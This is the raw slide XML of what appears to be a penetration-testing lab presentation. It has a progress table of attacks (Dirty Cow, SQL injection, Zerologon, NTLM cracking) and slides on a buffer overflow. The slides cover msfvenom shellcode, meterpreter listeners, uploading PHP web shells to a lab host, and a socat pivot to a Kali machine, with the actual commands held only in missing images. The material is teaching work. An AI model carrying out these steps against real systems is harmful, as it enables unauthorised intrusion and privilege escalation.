                        <a:t>FireFart/Dirty Cow Remote Privilege Escalation</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:solidFill>
                      <a:srgbClr val="CFD7E7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:solidFill>
                      <a:srgbClr val="CFD7E7"/>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sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>SQL Injection </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:solidFill>
                      <a:srgbClr val="E8ECF4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:solidFill>
                      <a:srgbClr val="E8ECF4"/>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sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Build AD Infrastructure</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnB w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="CFD7E7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnB w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="CFD7E7"/>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US" sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>AD Exploit - Zerologon</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                    <a:lnR w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnR>
                    <a:lnT w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                    <a:lnB w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="E8ECF4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                    <a:lnR w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnR>
                    <a:lnT w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                    <a:lnB w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="E8ECF4"/>
                    </a:solidFil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US" sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Hash cracking NTLM hashes</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnT w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="CFD7E7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnT w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="E8ECF4"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="CFD7E7"/>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gba014e31c3_0_107"/>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Buffer overflow (Crafting our payload)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="933" name="Google Shape;933;gba014e31c3_0_107"/>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Generate a payload using msfvenom. Then copy the generated shellcode into the exploit file.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="934" name="Google Shape;934;gba014e31c3_0_107"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904500" y="2559525"/>
            <a:ext cx="3763600" cy="40582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gba014e31c3_0_114"/>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Buffer overflow (Gaining shell)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="941" name="Google Shape;941;gba014e31c3_0_114"/>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Set up msfconsole multi/handler for a meterpreter shell. Then run the exploit.py script</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="942" name="Google Shape;942;gba014e31c3_0_114"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="750613" y="2464825"/>
            <a:ext cx="5934075" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="943" name="Google Shape;943;gba014e31c3_0_114"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="2827" b="39187"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="781175" y="3912625"/>
            <a:ext cx="7978400" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="944" name="Google Shape;944;gba014e31c3_0_114"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="781163" y="5149413"/>
            <a:ext cx="6010275" cy="12858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gba014e31c3_0_123"/>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Buffer overflow (Gaining shell)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="951" name="Google Shape;951;gba014e31c3_0_123"/>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a:t>We have successfully gotten a meterpreter shell and elevated our privileges to NT AUTHORITY\SYSTEM.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="952" name="Google Shape;952;gba014e31c3_0_123"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="741125" y="2857800"/>
            <a:ext cx="8210550" cy="21145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gba014e31c3_0_132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681310" y="6549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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="959" name="Google Shape;959;gba014e31c3_0_132"/>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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>Create 2 shell code for the 2 meterpreter sessions, upload it to the web server.</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="960" name="Google Shape;960;gba014e31c3_0_132"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="319012" y="2948600"/>
            <a:ext cx="8505976" cy="480400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="961" name="Google Shape;961;gba014e31c3_0_132"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="319000" y="3733149"/>
            <a:ext cx="8506000" cy="46627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gba014e31c3_0_148"/>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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="968" name="Google Shape;968;gba014e31c3_0_148"/>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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t>Upload shell.php and shell2.php to the website.</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="969" name="Google Shape;969;gba014e31c3_0_148"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163725" y="2674250"/>
            <a:ext cx="6816544" cy="37593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gba014e31c3_0_156"/>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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="976" name="Google Shape;976;gba014e31c3_0_156"/>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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t>Open 2 meterpreter listeners on kali machine. 1 for shell.php, 1 for shell2.php.</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="977" name="Google Shape;977;gba014e31c3_0_156"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766963" y="2636050"/>
            <a:ext cx="7273624" cy="33468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gba014e31c3_0_164"/>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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="984" name="Google Shape;984;gba014e31c3_0_164"/>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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Open 2 meterpreter listeners on kali machine. 1 for shell.php, 1 for shell2.php.</a:t>
            </a:r>
            <a:endParaRPr sz="2900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="985" name="Google Shape;985;gba014e31c3_0_164"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="2575141"/>
            <a:ext cx="7477200" cy="321558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gba014e31c3_0_172"/>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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="992" name="Google Shape;992;gba014e31c3_0_172"/>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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Go to 192.168.1.3/uploads/shell.php and 192.168.1.3/uploads/shell2.php to execute the payload.</a:t>
            </a:r>
            <a:endParaRPr sz="2900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="993" name="Google Shape;993;gba014e31c3_0_172"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="589325" y="3798875"/>
            <a:ext cx="7965349" cy="12570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gba014e31c3_0_180"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681310" y="7110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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1000" name="Google Shape;1000;gba014e31c3_0_180"/>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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>The 2 meterpreter sessions will be open.</a:t>
            </a:r>
            <a:endParaRPr sz="2900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1001" name="Google Shape;1001;gba014e31c3_0_180"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="833400" y="2520260"/>
            <a:ext cx="7477200" cy="1329015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1002" name="Google Shape;1002;gba014e31c3_0_180"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="681300" y="4134127"/>
            <a:ext cx="7781399" cy="1576973"/>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gba014e31c3_0_190"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665610" y="654956"/>
            <a:ext cx="7781400" cy="60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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1009" name="Google Shape;1009;gba014e31c3_0_190"/>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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700"/>
              <a:t>Run the socat command for pivoting. It will listen for connections at port 5555 and forward it to attacker kali machine at port 9999.</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1010" name="Google Shape;1010;gba014e31c3_0_190"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
